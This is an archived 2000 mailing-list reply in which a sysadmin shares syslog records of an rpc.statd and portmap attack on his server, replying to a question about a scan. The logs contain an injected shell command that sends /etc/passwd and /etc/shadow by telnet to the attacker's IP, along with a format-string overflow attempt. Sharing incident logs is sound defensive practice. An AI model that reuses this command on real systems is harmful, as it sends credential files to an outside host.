Security Incidents mailing list archives

Previous By Date Next
Previous By Thread Next

Re: funky syslog entry

From: BPontz () E-DIALOG COM (Brian Pontz)
Date: Thu, 29 Jun 2000 14:21:50 -0400

Since rpc attacks has come up I thought I'd share this attack
that happened to me last year. The hacker ended up crashing
the server.

Brian

Oct  5 01:36:09 vs1 sshd[5125]: connect from c992426-f.pinol1.sfba.home.com

Oct  5 01:36:15 vs1 NcFTPd: Someone from 24.5.193.149 tried to login as
"root" user.

Oct  5 01:36:49 vs1 rpc.statd: Invalid hostname to sm_mon:
/../../../tmp/Max.rpc.statd.vulnerability

Oct  5 01:36:51 vs1 portmap[5130]: connect from 24.5.193.149 to set(1002):
request from non-local host

Oct  5 01:36:51 vs1 portmap[5131]: connect from 24.5.193.149 to
callit(portmapper): request not forwarded

Oct  5 01:36:53 vs1 rpc.statd: Invalid hostname to sm_mon: ^?^?^?^?

Oct  5 01:36:54 vs1 portmap[5132]: connect from 24.5.193.149 to
callit(portmapper): request not forwarded

Oct  5 01:36:54 vs1 rpc.statd: unmon request from anti-slavery for unknown
host ^?^?^?^?

Oct  5 01:36:55 vs1 rpc.statd: Invalid hostname to sm_mon: -c "sleep 2;sleep
15|/bin/cat /etc/passwd /etc/shadow - |/bin/telnet 24.5.193.149 1593

/dev/null"


Oct  5 01:36:55 vs1 rpc.statd: unmon request from anti-slavery for unknown
host -c "sleep 2;sleep 15...skipping...

Oct  5 01:36:09 vs1 sshd[5125]: connect from c992426-f.pinol1.sfba.home.com

Oct  5 01:36:15 vs1 NcFTPd: Someone from 24.5.193.149 tried to login as
"root" user.

Oct  5 01:36:49 vs1 rpc.statd: Invalid hostname to
sm_mon:/../../../tmp/Max.rpc.statd.vulnerability

Oct  5 01:36:51 vs1 portmap[5130]: connect from 24.5.193.149 to set(1002):
request from non-local host

Oct  5 01:36:51 vs1 portmap[5131]: connect from 24.5.193.149 to
callit(portmapper): request not forwarded

Oct  5 01:36:53 vs1 rpc.statd: Invalid hostname to sm_mon: ^?^?^?^?

Oct  5 01:36:54 vs1 portmap[5132]: connect from 24.5.193.149 to
callit(portmapper): request not forwarded

Oct  5 01:36:54 vs1 rpc.statd: unmon request from anti-slavery for unknown
host ^?^?^?^?

Oct  5 01:36:55 vs1 rpc.statd: Invalid hostname to sm_mon: -c "sleep 2;sleep
15|/bin/cat /etc/passwd /etc/shadow - |/bin/telnet 24.5.193.149 1593

/dev/null"


Oct  5 01:36:55 vs1 rpc.statd: unmon request from anti-slavery for unknown
host -c "sleep 2;sleep 15|/bin/cat /etc/passwd /etc/shadow - |/bin/telnet
24.5.193.149 1593 >/dev/null"

Oct  5 01:36:57 vs1 portmap[5133]: connect from 24.5.193.149 to
callit(mountd): request not forwarded

Oct  5 01:36:57 vs1 portmap[5134]: connect from 24.5.193.149 to
callit(portmapper): request not forwarded

Oct  5 01:37:00 vs1 portmap[5135]: connect from 24.5.193.149 to
callit(mountd): request not forwarded

Oct  5 01:37:01 vs1 NcFTPd: Someone from 24.5.193.149 tried to login as
"root" user.

Oct  5 01:37:03 vs1 portmap[5136]: connect from 24.5.193.149 to
callit(mountd): request not forwarded

Oct  5 01:37:06 vs1 portmap[5138]: connect from 24.5.193.149 to
callit(mountd):request not forwarded

Oct  5 01:37:07 vs1 NcFTPd: Someone from 24.5.193.149 tried to login as
"root" user.

Oct  5 01:37:09 vs1 portmap[5140]: connect from 24.5.193.149 to
callit(mountd): request not forwarded

Oct  5 01:37:12 vs1 portmap[5142]: connect from 24.5.193.149 to
callit(mountd): request not forwarded

Oct  5 01:37:13 vs1 NcFTPd: Someone from 24.5.193.149 tried to login as
"root" user.

Oct  5 01:37:15 vs1 portmap[5144]: connect from 24.5.193.149 to
callit(mountd): request not forwarded

Oct  5 01:37:18 vs1 portmap[5145]: connect from 24.5.193.149 to
callit(mountd): request not forwarded

Oct  5 01:37:20 vs1 NcFTPd: Someone from 24.5.193.149 tried to login as
"root" user.

Oct  5 01:37:21 vs1 portmap[5146]: connect from 24.5.193.149 to
callit(mountd): request not forwarded

Oct  5 01:37:24 vs1 portmap[5147]: connect from 24.5.193.149 to
callit(mountd): request not forwarded

Oct  5 01:37:26 vs1 NcFTPd: Someone from 24.5.193.149 tried to login as
"root" user.

Oct  5 01:37:32 vs1 /kernel: pid 5148 (Count.cgi1.2), uid 65534: exited on
signal 10

Oct  5 01:37:32 vs1 NcFTPd: Someone from 24.5.193.149 tried to login as
"root" user.

Oct  5 01:37:45 vs1 last message repeated 2 times

Oct  5 01:37:59 vs1 sshd[5152]: connect from c992426-f.pinol1.sfba.home.com

Oct  5 01:38:05 vs1 sshd[5153]: connect from c992426-f.pinol1.sfba.home.com

Oct  5 01:41:40 vs1 NcFTPd: Someone from 24.5.193.149 tried to login as
"uucp" user.

Oct  5 01:42:13 vs1 last message repeated 4 times

Oct  5 01:42:37 vs1 last message repeated 3 times

Oct  5 01:45:58 vs1 NcFTPd: Someone from 24.5.193.149 tried to login as
"www" user, whose shell is illegal (/nonexistent).

Oct  5 01:46:31 vs1 last message repeated 4 times

Oct  5 01:46:53 vs1 last message repeated 3 times

Oct  5 01:47:02 vs1 NcFTPd: Someone from 24.5.193.149 tried to login as
"nobody" user, whose shell is illegal (/nonexistent).

Oct  5 01:47:40 vs1 last message repeated 5 times

Oct  5 01:47:55 vs1 last message repeated 2 times

Oct  5 02:09:31 vs1 rpc.statd: Invalid hostname to sm_mon: cybercop

Oct  5 02:09:32 vs1 rpc.statd: unmon request from localhost for unknown host
cybercop

Oct  5 02:09:33 vs1 rpc.statd: Invalid hostname to sm_mon:
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%

Oct  5 02:09:33 vs1 rpc.statd: unmon request from
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%

Oct  5 02:42:04 vs1 sshd[5524]: connect from c992426-d.pinol1.sfba.home.com

Oct  5 02:53:41 vs1 /kernel: pid 5565, uid 65534: exited on signal

-----Original Message-----
From: klug [mailto:klug () KLUG CX]
Sent: Monday, June 26, 2000 5:44 PM
To: INCIDENTS () SECURITYFOCUS COM
Subject: funky syslog entry

While searching through syslog entries I found this little tid bit.
Others and I, believe its some sort of scan. Any ideas are welcome.
Portmap has sense been removed from this server.

klug

Jun 24 14:39:10 * portmap[27279]:
connect from 193.40.245.45 to dump(): request from unauthorized host
Previous By Date Next
Previous By Thread Next

Current thread: